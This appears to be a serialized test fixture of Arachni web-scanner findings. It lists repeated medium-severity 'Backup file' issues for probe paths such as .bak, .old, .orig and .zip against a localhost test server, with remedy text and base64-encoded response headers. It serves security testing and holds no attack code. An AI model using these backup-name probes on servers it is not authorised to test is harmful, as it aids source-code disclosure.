backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php.BAK elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php.BAK injected: some_filename.php.BAK id: some_filename.php.BAK elem: path remarks: {} method: '' response: some_filename.php.BAK headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php.OLD elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php.OLD injected: some_filename.php.OLD id: some_filename.php.OLD elem: path remarks: {} method: '' response: some_filename.php.OLD headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php.bak elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php.bak injected: some_filename.php.bak id: some_filename.php.bak elem: path remarks: {} method: '' response: some_filename.php.bak headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.OLD elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.OLD injected: some_filename.OLD id: some_filename.OLD elem: path remarks: {} method: '' response: some_filename.OLD headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTc= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.BAK elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.BAK injected: some_filename.BAK id: some_filename.BAK elem: path remarks: {} method: '' response: some_filename.BAK headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTc= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php.old elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php.old injected: some_filename.php.old id: some_filename.php.old elem: path remarks: {} method: '' response: some_filename.php.old headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php.orig elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php.orig injected: some_filename.php.orig id: some_filename.php.orig elem: path remarks: {} method: '' response: some_filename.php.orig headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjI= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.orig elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.orig injected: some_filename.orig id: some_filename.orig elem: path remarks: {} method: '' response: some_filename.orig headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTg= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php.backup elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php.backup injected: some_filename.php.backup id: some_filename.php.backup elem: path remarks: {} method: '' response: some_filename.php.backup headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjQ= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.backup elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.backup injected: some_filename.backup id: some_filename.backup elem: path remarks: {} method: '' response: some_filename.backup headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjA= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php.000 elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.php.000 injected: some_filename.php.000 id: some_filename.php.000 elem: path remarks: {} method: '' response: some_filename.php.000 headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MjE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOTowOSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.ZIP elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml opts: :regexp: '' url: http://localhost:8405/some_filename.ZIP injected: some_filename.ZIP id: some_filename.ZIP elem: path remarks: {} method: '' response: some_filename.ZIP headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MTc= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
mod_name: Backup files variations: [] internal_modname: BackupFiles internal_modname: BackupFiles - !ruby/object:Arachni::Issue verification: false references: WebAppSec: http://www.webappsec.org/projects/threat/classes/information_leakage.shtml url: http://localhost:8405/some_filename.php.ZIP elem: path method: '' name: Backup file description: ! "The server response indicates that a file matching\n the name of a common naming scheme for file backups can be publicly accessible.\n A developer has probably forgotten to remove this file after testing.\n This can lead to source code disclosure and privileged information leaks." tags: - path - backup - file - discovery severity: Medium remedy_guidance: ! "Do not keep alternative versions of files underneath the virtual web server root.\n When updating the site, delete or move the files to a directory outside the virtual root, edit them there,\n and move (or copy) the files back to the virtual root. Make sure that only the files that are actually in use reside under the virtual root." 
